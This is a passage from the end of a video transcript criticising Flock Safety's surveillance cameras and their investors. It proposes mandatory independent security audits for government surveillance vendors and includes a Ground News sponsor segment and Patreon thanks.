everything they can to take Flock Safety's place on the leaderboard. If somehow we all woke up tomorrow morning and Flock ceased to exist, another startup would quickly be in their place, promising to help police solve crime in exchange for taxpayer money. But do you want to know what I find absolutely outrageous? That over 80,000 surveillance cameras were installed all over the country, and I'm not aware of a single public audit of the devices, the services, or the technology. And if there had been one,
it would have found the exact same low-hanging fruit detailed in this video. And that's the big difference here that we need to constantly be acknowledging. Your government supposedly exists to keep order, security, and safety for society. Flock Safety exists to make money. They're not a charity; they're a $7.5 billion tech startup reportedly preparing to launch an IPO. And by far, their biggest investor is Andreessen Horowitz. So this is pretty simple stuff. Should we trust civilian data with
a company that is partially controlled and funded by Andreessen Horowitz? Well, let's see. Marc Andreessen was a board member of Facebook during the Cambridge Analytica scandal and was one of the people on the hook for over eight billion dollars in privacy-violation settlements. A16z portfolio company Coinbase exposed sensitive information of 69,000 customers. Even the a16z website itself had flaws allowing hackers to pull sensitive information about their portfolio companies. Ah, there's so much. What else? LendUp was shut down in 2021 for repeatedly
breaking the law and cheating its own customers. Tellus deceived its customers into thinking that they were putting their money into FDIC-insured savings accounts. Wise was involved in funding Hamas and pig-butchering crypto schemes. But no, I'm sure this time it'll be fine. I'm so sure that it'll be fine that I'm not even going to look under the hood. I have an idea, and it's a pretty obvious conclusion to all of this. And I think it's an idea that anyone watching this can agree on. Well, except for maybe the people invested in government
surveillance. But hear me out. If a private company wants to offer services to the government that are related to national security, public surveillance, or processing data that will be used within the public justice system, they will have to pay an application fee and provide access to any hardware or software that they intend to put in public. This application fee will pay for a small team of independent security researchers who are vetted and unaffiliated with the services or products
that they're researching. This team will essentially do exactly what we did in this video, but with adequate resources. If problems are discovered, CVEs will be published and responsible disclosure will be followed, which would presumably help the company tighten things up without having to pay bug bounties. And if no major problems are discovered, then the company will receive a rating that will be valid for one year, until they have to renew their vendor license and get a less intensive inspection. This is not too much to ask. You can't open a hair salon without a
license. You can't keep a McDonald's open without a health inspection. You can't legally drive a car past a Flock Safety camera without taking a routine driver's test and having a vehicle that passes basic safety requirements. This is an apolitical, common-sense solution to a really big problem. I'm going to formally propose it to the legislators I'm in contact with, and I think it'd be really useful if you, yeah, you, wrote, emailed, and called your representatives, senators, and state attorneys general proposing the same thing. I don't believe that humans are intrinsically right or left,
but if you haven't noticed, finding objectivity in the media right now is like being a grasshopper stuck in the middle of a football field. I'm very familiar with Ground News; I've been a paying customer of the service for years. It's an app and a website that collects news articles from around the world and organizes them by political bias, reliability, and potential conflicts of interest, such as media ownership. Ground News themselves are independently owned, funded by subscribers like myself, and vetted by three different independent news-monitoring organizations.
So here's an example. Here we have this AI-generated drone illustration hovering over protesters, warning them that they're being monitored by Predator drones orbiting over Los Angeles. Yes, orbiting. I suppose if people can believe that the Earth is flat, then people can believe that LA is a celestial body. Okay, so I head over to Ground News to see if this is even a thing and, kablam, it is. Then you can see these bias filters, which you could use as a sort of political compass, or as an amusing joyride to see how cooked we all are. I can easily see who owns
the media source, and then their factuality score from three different news-monitoring organizations. And then, if I'm feeling brave, I can use the Blindspot feature to see the news stories that my own personal internet echo chamber isn't showing me. And as usual, when I have a sponsor on this channel, any profit from that sponsorship will go to UNICEF Ukraine. Russia is actively targeting Ukraine's infrastructure, and nothing spoils the holidays like knowing that you didn't help children who are freezing to death. If you're into this, you can subscribe to get 40% off the Vantage
plan by scanning this QR code or using my link, ground.news/ben. In my last video on this, I talked a lot about ethics. I talked a lot about how ALPRs and AI cameras could be misused, and how they already have been misused. I outlined how I believe this easily violates Americans' Fourth Amendment rights. And here is some feel-good information that you probably don't get to hear much of in 2025: this is a completely nonpartisan issue.
One could use this type of surveillance to track people that ICE intends to capture or deport. Or one could use this type of surveillance to track ICE, to sabotage or warn people about raids. It could be used to track a woman leaving her state to get an abortion. It could also be used to track someone driving around during a lockdown in a pandemic. There is no civilian anywhere who is always 100% aligned with their government throughout their entire life. If mass surveillance
sounds good to you today, then it probably wouldn't have sounded good to you five years ago, and I guarantee you that it won't sound good to you at some point in the future. This isn't a right-versus-left thing, or a Republican-versus-Democrat thing, or an empathy-versus-logic thing. It's an authoritarian-versus-individual thing. Privacy is a form of power that increases your control over your own destiny. And right now, you're at a junction where you're being made to be so scared of
your neighbors that you might be willing to give up that power. Or you can simply say no: I refuse to pay for my every movement to be tracked by my government through a for-profit company that hasn't even been adequately vetted to protect my security. But for this to stop, you need to use your voice and you need to get involved. There are links in the description to show you exactly how to do that. This video is by far the most time-consuming, impactful,
expensive, and collaborative project I've done on this channel or with this nonprofit. Obviously, it would not have been possible without John Gaines's incredible and thorough research, or Josh's determination, ethics, and skill set. If you work in government and listened to that part a few minutes ago about setting up a research team to vet technology vendors courting government contracts, both John's and Josh's websites with their contact information can be found in the description. I also need to thank the exhaustive level of work from Ed Vogel,
Sassy, Lucy Parsons Labs, my legal counsel, Albert Sowers, LLP, and those incredibly brave individuals who trusted me with information that could get them in a lot of trouble for sharing. They put the safety and common good of society above their own interests, and I want to acknowledge how meaningful and frankly beautiful that is. I want to thank all the legislators, police officers, and commissioners who, instead of calling me a terrorist, participated in a civil discussion
on how to serve their communities better. But most of all, I want to thank my Patreon members. It might not seem like it, but this video and the associated research, fact-checking, and legal counsel cost tens of thousands of dollars. And quite literally, without the support of my Patreon members, independent research like this would be impossible for me. If you want to join that community and pitch in for more content like this, as well as a whole lot of dorky and sciencey and artsy content, and be part of an incredible Discord community and forum full of
like-minded folks and a monthly songwriting challenge, you can join for as little as one dollar. Thanks for watching. Keep creating. Bye.